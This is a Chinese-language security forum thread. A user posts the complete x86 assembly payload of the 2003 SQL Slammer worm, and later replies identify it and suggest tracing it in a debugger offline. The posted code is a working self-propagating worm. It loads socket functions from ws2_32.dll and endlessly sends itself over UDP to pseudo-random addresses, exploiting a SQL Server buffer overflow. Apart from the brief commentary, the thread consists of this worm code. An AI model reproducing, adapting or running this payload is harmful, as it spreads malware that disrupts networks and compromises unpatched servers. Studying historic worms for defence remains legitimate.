|
作者: tomas [tomas] 论坛用户 | 登录 |
push 42B0C9DCh mov eax, 1010101h xor ecx, ecx mov cl, 18h fill: push eax loop fill xor eax, 5010101h push eax mov ebp, esp push ecx push 6C6C642Eh push 32336C65h push 6E72656Bh push ecx push 746E756Fh push 436B6369h push 54746547h mov cx, 6C6Ch push ecx push 642E3233h push 5F327377h mov cx, 7465h push ecx push 6B636F73h mov cx, 6F74h push ecx push 646E6573h mov esi, 42AE1018h lea eax, [ebp-2Ch] push eax call dword ptr [esi] push eax lea eax, [ebp-20h] push eax lea eax, [ebp-10h] push eax call dword ptr [esi] push eax mov esi, 42AE1010h mov ebx, [esi] mov eax, [ebx] cmp eax, 51EC8B55h jz short good mov esi, 42AE101Ch good: call dword ptr [esi] call eax xor ecx, ecx push ecx push ecx push eax xor ecx, 9B040103h xor ecx, 1010101h push ecx lea eax, [ebp-34h] push eax mov eax, [ebp-40h] push eax call dword ptr [esi] push 11h push 2 push 2 call eax push eax lea eax, [ebp-3Ch] push eax mov eax, [ebp-40h] push eax call dword ptr [esi] mov esi, eax or ebx, ebx xor ebx, 0FFD9613Ch fly: mov eax, [ebp-4Ch] lea ecx, [eax+eax*2] lea edx, [eax+ecx*4] shl edx, 4 add edx, eax shl edx, 8 sub edx, eax lea eax, [eax+edx*4] add eax, ebx mov [ebp-4Ch], eax push 10h lea eax, [ebp-50h] push eax xor ecx, ecx push ecx xor cx, 178h push ecx lea eax, [ebp+3] push eax mov eax, [ebp-54h] push eax call esi jmp short fly |
地主 发表时间: 02/10 15:58 |
回复: wiqe [wiqe] 论坛用户 | 登录 |
一段原代码哈~! |
B1层 发表时间: 02/11 15:37 |
回复: tomas [tomas] 论坛用户 | 登录 |
国外叫 Slammer 监狱 国内有人叫他 2003蠕虫王 利用 SQLServer 的一个缓冲溢出漏洞循环发送自身 300多字节的蠕虫造成的危害,相信大家都有目共睹 如果你想看看他到底是怎么做的,需要一套 SQLServer 软件 在调试器下运行(推荐你用 WinDbg),然后输入这些代码再 单步跟踪,当然,实验之前一定先断掉网络连接,否则可能惹 上不必要的麻烦,如果 FBI找到你,别愿我没提醒你啊 :P 如果你有能力跟踪完,而且明白每一条语句的作用,你就会知 道,这个东西,不过如此,没什么高深的。。。 |
B2层 发表时间: 02/11 16:48 |
回复: zeatul [zeatul] 论坛用户 | 登录 |
汇编语言源代码 |
B3层 发表时间: 02/14 21:35 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号